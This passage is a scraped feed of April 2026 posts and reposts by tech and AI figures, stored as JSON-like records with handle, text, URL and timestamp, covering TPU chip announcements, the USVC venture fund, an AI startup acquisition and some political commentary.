a non-dystopian version will require world models and zero-shot planning abilities.\n4. I rarely wear a suit and absolutely never wear a tie.\n5. I would never ever place a coffee mug on top of a piece equipment.\n6. I hope I'll look this young in 2032.", + "url": "https://x.com/ylecun/status/2047636569767419951", + "published_at": "2026-04-24T11:19:36+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques.\n\nWith @ELLISUnitMadrid.\n\n📍 Madrid 🇪🇸 \n📅 June 8-19th\n⏰ Apply by June 3rd\n🔗 https://cig.fi.upm.es/mlas/", + "url": "https://x.com/ylecun/status/2047624126047670758", + "published_at": "2026-04-24T10:30:09+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabituellement cohérent, mérite une lecture attentive. Il révèle bien plus qu'une opinion sur l'immigration.\n\n▶️ Commençons par l'évidence que tout le monde remarque : ce texte n'a pas été écrit par Donald Trump.\nTrump écrit en majuscules intempestives, en phrases courtes, avec des digressions abruptes et une syntaxe chaotique. Ce texte est long, structuré, argumenté, avec une progression rhétorique délibérée, une introduction, des exemples, une montée en puissance émotionnelle, une conclusion en appel à l'action. C'est la marque de fabrique de Stephen Miller, architecte de la politique migratoire de Trump depuis dix ans, dont l'organisation America First Legal est précisément celle qui a construit les arguments juridiques soumis à la Cour Suprême. \n\nMiller rédige. Trump signe. C'est une mécanique documentée depuis des années.\n\n▶️ Ce qui rend ce texte particulièrement remarquable, c'est son timing et son objectif.\n\nLe 1er avril, Trump a assisté en personne aux plaidoiries de la Cour Suprême sur le droit du sol, la première fois dans l'histoire américaine qu'un président en exercice assiste à des arguments oraux devant la Cour. \n\nLa majorité des juges, y compris ceux nommés par Trump lui-même, ont exprimé un scepticisme marqué.\n\nCe post fleuve publié dans les jours suivants n'est pas une réflexion spontanée. C'est une tentative d'influencer l'opinion publique, et peut-être les juges eux-mêmes, avant que la décision ne tombe en juin. \n\nVenons-en aux affirmations les plus choquantes du texte, point par point.\n\n▶️ \"Nous sommes le seul pays au monde assez stupide pour autoriser le droit du sol.\" C'est factuellement faux. Une trentaine de pays garantissent la citoyenneté aux enfants nés sur leur territoire, dont le Canada, le Mexique, le Brésil et l'Argentine. \n\n▶️ Trump écrit en substance que les Indiens et les Chinois qu'il qualifie de \"gangsters with laptops\", occupent toutes les places dans la tech californienne, que les Blancs n'ont plus leur chance, et que ce n'est plus leur pays. \n\nLes ingénieurs d'origine indienne et chinoise sont les architectes de l'économie technologique américaine, la même économie dont Trump se félicite en permanence. Google, Microsoft, Adobe, IBM, Palo Alto Networks, Arista Networks : autant de géants américains dirigés par des PDG d'origine indienne. \n\nSelon le rapport Stanford HAI 2026, les États-Unis investissent 285 milliards en IA et 80% des chercheurs en IA américains sont nés à l'étranger. Expulser ou décourager ces populations, c'est amputer l'innovation américaine au bénéfice de la Chine, l'adversaire que Trump prétend combattre.\n\n▶️ L'ACLU (American Civil Liberties Union, organisation fondée en 1920 pour défendre les libertés constitutionnelles américaines) est qualifiée \"d'organisation criminelle, la plus dangereuse de l'histoire des États-Unis,\" plus dangereuse que l'Iran. Trump écrit qu'elle \"a fait plus de dégâts à ce pays que l'Iran n'en a jamais fait\" et appelle à la poursuivre sous une loi antimafia. \n\n▶️ \"Le melting pot est terminé. C'est juste une marmite à cash.\" Le melting pot (le creuset en français), est le mythe fondateur de l'identité américaine depuis deux siècles. Lithuaniens, Roumains, Russes, Polonais, Italiens : Trump les cite lui-même comme exemples de bonnes intégrations. Il oublie de mentionner que ces vagues migratoires européennes ont elles aussi été accueillies avec les mêmes discours : les Irlandais traités de sous-humains, les Italiens lynchés, les Polonais moqués pour leur manque de loyauté. L'histoire se répète. Seule la nationalité des boucs émissaires change.\n\n📕 Dans Le Pantin de la Maison Blanche, j'analyse comment Stephen Miller, idéologue de l'immigration ethno-nationaliste depuis vingt ans, utilise Trump comme amplificateur de sa vision du monde. Ce texte en est la démonstration la plus pure.\n\nL'Amérique a été construite par les enfants de ceux que ce texte veut expulser. Jensen Huang, NVIDIA, l'entreprise qui alimente la révolution IA mondiale, est né à Taïwan. Sundar Pichai, Google, est né en Inde. Satya Nadella, Microsoft, est né en Inde. Chacun d'eux est le produit d'une Amérique qui croyait encore à la vertu de ce fameux meltin pot. Ce texte leur dit que cette Amérique est terminée.\n\n📖 Le Pantin de la Maison Blanche → https://www.amazon.fr/dp/B0GPCCMS68/", + "url": "https://x.com/ylecun/status/2047565736382534091", + "published_at": "2026-04-24T06:38:08+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://x.com/naval/status/2047550896670908809", + "published_at": "2026-04-24T05:39:10+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://x.com/naval/status/2047546920747307466", + "published_at": "2026-04-24T05:23:22+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://x.com/liuliu/status/2047527371486658814", + "published_at": "2026-04-24T04:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://x.com/naval/status/2047520212787015748", + "published_at": "2026-04-24T03:37:14+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://x.com/naval/status/2047519250433421604", + "published_at": "2026-04-24T03:33:25+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://x.com/naval/status/2047510419565420779", + "published_at": "2026-04-24T02:58:19+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://x.com/eladgil/status/2047489459378397604", + "published_at": "2026-04-24T01:35:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://x.com/naval/status/2047481012826124516", + "published_at": "2026-04-24T01:01:28+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitorability of their own models.\n\nhttps://alignment.openai.com/monitorability-evals/", + "url": "https://x.com/sama/status/2047473914528563592", + "published_at": "2026-04-24T00:33:16+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。", + "url": "https://x.com/svwang1/status/2047472537488302502", + "published_at": "2026-04-24T00:27:47+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://x.com/naval/status/2047471220451578132", + "published_at": "2026-04-24T00:22:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。", + "url": "https://x.com/svwang1/status/2047470402725921150", + "published_at": "2026-04-24T00:19:18+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://x.com/HarryStebbings/status/2047461264998478113", + "published_at": "2026-04-23T23:43:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://x.com/ylecun/status/2047454244781818205", + "published_at": "2026-04-23T23:15:06+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\n\"I used to think MAUs and WAUs did not matter, now I think they are critical.\n\nIn the AI era, usage is the leading indicator of value.\n\nIf your usage is growing faster than revenue, you are building something people truly want.\" @jasonlk\n\nLove to hear your thoughts on this @joshelman @kirbyman01 @Joshuabrowder @an21m @mignano and how your thoughts on what matters changed?", + "url": "https://x.com/HarryStebbings/status/2047426032840634830", + "published_at": "2026-04-23T21:23:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://x.com/eladgil/status/2047421448449630379", + "published_at": "2026-04-23T21:04:47+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. \n\nThere were next to no signs 20VC was or would be a success. \n\nHe has been a dear friend ever since!", + "url": "https://x.com/HarryStebbings/status/2047413285675290984", + "published_at": "2026-04-23T20:32:21+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://x.com/JeffDean/status/2047408945950802186", + "published_at": "2026-04-23T20:15:06+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://x.com/JeffDean/status/2047407537566495033", + "published_at": "2026-04-23T20:09:30+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://x.com/JeffDean/status/2047405389856297387", + "published_at": "2026-04-23T20:00:58+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://x.com/JeffDean/status/2047403921912873257", + "published_at": "2026-04-23T19:55:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"don't retweet this, don't retweet this, don't retweet this...\"\n\nah fuck it, life imitates art.", + "url": "https://x.com/sama/status/2047403771416940715", + "published_at": "2026-04-23T19:54:32+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work.\n\nLet us know if you'd like to do it at your company!", + "url": "https://x.com/sama/status/2047395562501411058", + "published_at": "2026-04-23T19:21:55+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "embers", + "url": "https://x.com/sama/status/2047392357482639749", + "published_at": "2026-04-23T19:09:11+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up to find completed sweep dashboards and samples, never having touched code or a terminal at all", + "url": "https://x.com/sama/status/2047386955550470245", + "published_at": "2026-04-23T18:47:43+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: New in the Codex app:\n\n- GPT-5.5\n- Browser control\n- Sheets & Slides\n- Docs & PDFs\n- OS-wide dictation\n- Auto-review mode\n\nEnjoy!", + "url": "https://x.com/sama/status/2047381565534322694", + "published_at": "2026-04-23T18:26:18+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️\n\nRead for free or purchase in print ➡️ https://archive.org/details/vanishing-culture-2026", + "url": "https://x.com/ylecun/status/2047378161860776085", + "published_at": "2026-04-23T18:12:46+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://x.com/liuliu/status/2047374234004115719", + "published_at": "2026-04-23T17:57:10+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://x.com/eladgil/status/2047373700643844303", + "published_at": "2026-04-23T17:55:03+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Does the $60BN Cursor Deal Make Sense:\n\n\"It actually makes sense when you look at what each side lacks.\n\nOne has explosive revenue but weak margins due to compute and model costs.\n\nThe other has massive compute and models but no real revenue.\n\nPut them together and it solves both problems.\" @rodriscoll\n\nLove to hear your thoughts on this @levie @ttunguz @matanSF @shaunmmaguire @beffjezos @martin_casado", + "url": "https://x.com/HarryStebbings/status/2047371926335857036", + "published_at": "2026-04-23T17:48:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://x.com/eladgil/status/2047365014500389353", + "published_at": "2026-04-23T17:20:32+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://x.com/eladgil/status/2047364865527075139", + "published_at": "2026-04-23T17:19:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "It is a very expensive desire to be a value investor today. \nIt is much easier to be a momentum investor, that is for sure.", + "url": "https://x.com/HarryStebbings/status/2047358263868436791", + "published_at": "2026-04-23T16:53:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://x.com/JeffDean/status/2047339995682529313", + "published_at": "2026-04-23T15:41:07+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://x.com/naval/status/2047334901033123913", + "published_at": "2026-04-23T15:20:52+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear designed to intimidate a journalist for revealing potential abuses, the message is unmistakable: be quiet or be targeted. That’s how fear replaces truth. That’s how a free press is pushed toward silence. And that’s how democracies start to collapse.", + "url": "https://x.com/ylecun/status/2047321581966291154", + "published_at": "2026-04-23T14:27:57+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF\nYoutube 👉 https://youtu.be/s61XVZAt5ns\nApple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acquired-for-%2460bn-by-xai-anthropic-hits/id958230465?i=1000763211245", + "url": "https://x.com/HarryStebbings/status/2047316269465006363", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This is the big f**king deal.\n\nCursor acquired for $60BN by xAI\n\nI sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week:\n\n- Anthropic Hits $1TRN in Secondary Markets\n- Anthropic Launches Claude Code\n- Rippling Hits $1BN in ARR\n- Cerebras Files for IPO\n\nMy notes below:\n\n1. This $60B deal actually makes sense\n\nThe potential $60 billion acquisition of Cursor by xAI/SpaceX is an industrial \"marriage made in heaven\". Cursor has an exploding business with billions in ARR but \"shitty\" gross margins because they lack their own compute and models. Elon Musk has the massive Colossus GPU data center and a model (Grok) but effectively no revenue, making the vertical integration of these two companies a strategic fix for both.\n\n2. How Claude Design Will Hurt Figma\n\nAnthropic’s Claude Design is a full design application, not just a set of prompts or skills. It poses an existential threat because it allows product and engineering teams to bypass the traditional 30-day designer turnaround. By enabling \"normal people\" to design and move into production immediately, it will \"maim and nibble\" at Figma’s growth over the coming quarters.\n\n3. I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\nIn the B2B world, usage metrics like MAUs, WAUs, and DAUs are now more critical than revenue. If usage isn't growing faster than revenue, it's a sign of a struggling startup or \"stealth churn,\" where users have stopped active engagement despite the company still collecting fees. In the AI age, the ultimate test of a product's value is whether people are actually using its AI features daily.\n\n4. Why the biggest fintech players are in for a shock.\n\nExisting moats for fintech giants like Brex and Ramp are weakening as the selection criteria for vendors shifts. Customers are no longer prioritizing a dashboard's UI; they care which API works best with their autonomous AI agents. If a new vendor offers a superior API that allows an \"AI VP of Finance\" to automate tasks like collections, companies will switch vendors in a single week.\n\n5. Agent fabric is the layer that manages all your agents\n\nThe defining 2027 challenge is the \"agent fabric\". The infrastructure needed to manage and secure hundreds of autonomous agents. This gives a massive advantage to incumbents like Salesforce. They are positioning themselves as the trusted governance layer to guardrail agents and prevent them from going rogue", + "url": "https://x.com/HarryStebbings/status/2047316267858645088", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive 